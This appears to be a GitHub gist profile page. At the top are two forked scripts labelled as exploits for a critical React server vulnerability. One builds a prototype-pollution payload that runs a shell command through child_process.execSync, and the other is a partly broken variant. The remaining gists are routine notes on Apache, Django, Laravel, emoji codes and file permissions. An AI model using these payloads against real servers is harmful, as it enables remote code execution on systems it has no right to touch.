Skip to content

Instantly share code, notes, and snippets.

View razzul's full-sized avatar
🏠
Working from home

Razzul razzul

🏠
Working from home
View GitHub Profile
@razzul
razzul / exploit1.js
Created December 16, 2025 09:12 — forked from akshaymarch7/exploit1.js
React Critical Vulnerability (CVSS 10.0) - exploit1 code
(async () => {
// === CONFIGURATION ===
const cmd = "touch iWasHere"; // The command you want to run
const targetUrl = "/namaste"; // The endpoint to hit (relative to current domain)
console.log(`[*] Attempting to run command: ${cmd}`);
// 1. Construct the malicious payload
// This injects the command into a child_process.execSync call and throws the result in an error digest
const payloadJson = `{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('${cmd}').toString('base64');throw Object.assign(new Error('x'),{digest: res});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}`;
@razzul
razzul / exploit0.js
Created December 16, 2025 09:11 — forked from akshaymarch7/exploit0.js
React Critical Vulnerability (CVSS 10.0) - exploit0 code
(async () => {
// === CONFIGURATION ===
const targetUrl = "/namaste"; // The endpoint to hit (relative to current domain)
console.log(`[*] Attempting to run command: ${cmd}`);
// 1. Construct the malicious payload
// This injects the command into a child_process.execSync call and throws the result in an error digest
const payloadJson = `{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":"console.log('meowmeow')//","_formData":{"get":"$1:constructor:constructor"}}}`;
@razzul
razzul / proxy.md
Created July 27, 2020 06:29
apache proxy setup
  • sudo a2enmod proxy

  • sudo a2enmod proxy_http

  • sudo a2enmod proxy_balancer

  • sudo a2enmod lbmethod_byrequests

  • sudo a2enmod proxy_wstunnel

  • sudo service apache2 restart

  • sudo nano /etc/apache2/sites-available/000-default.conf

@razzul
razzul / pattern-programs.md
Created May 31, 2018 04:49
Pattern Programs

Pattern Programs

Change file name from `_` to `-`
-----------------
> $ for f in *.json; do mv "$f" "`echo $f | sed s/UTID_/UTID-/`"; done
@razzul
razzul / django.md
Last active March 5, 2018 10:38
Django

Create New Project:

$ django-admin startproject mysite
$ cd mysite
$ python manage.py runserver

Create New Application:

$ python manage.py startapp polls
$ python manage.py migrate

@razzul
razzul / emoji.md
Created November 28, 2017 09:43
emoji

People

:bowtie: :bowtie: πŸ˜„ :smile: πŸ˜† :laughing:
😊 :blush: πŸ˜ƒ :smiley: ☺️ :relaxed:
😏 :smirk: 😍 :heart_eyes: 😘 :kissing_heart:
😚 :kissing_closed_eyes: 😳 :flushed: 😌 :relieved:
πŸ˜† :satisfied: 😁 :grin: πŸ˜‰ :wink:
😜 :stuck_out_tongue_winking_eye: 😝 :stuck_out_tongue_closed_eyes: πŸ˜€ :grinning:
πŸ˜— :kissing: πŸ˜™ :kissing_smiling_eyes: πŸ˜› :stuck_out_tongue:
@razzul
razzul / laravel-cmd.md
Last active November 28, 2017 07:37
Laravel console

php artisan make:command QuizStart --command=quiz:start

// /app/console/Kernel.php
protected $commands = [
    // Commands\Inspire::class,
    'App\Console\Commands\QuizStart'
];
@razzul
razzul / file_permision.md
Last active November 14, 2017 06:11
File Permision

File system permissions

Symbolic Notation Numeric Notation English
---------- 0000 no permissions
-rwx------ 0700 read, write, & execute only for owner
-rwxrwx--- 0770 read, write, & execute for owner and group
-rwxrwxrwx 0777 read, write, & execute for owner, group and others
---x--x--x 0111 execute
--w--w--w- 0222 write
@razzul
razzul / array_merge_recursive.md
Last active November 24, 2017 13:03
array_merge_recursive issue in linux

array_merge_recursive issue

$final_errors = array(
    'codes' => array(),
    'messages' => array(),
    'details' => array(),
);

$errors = array(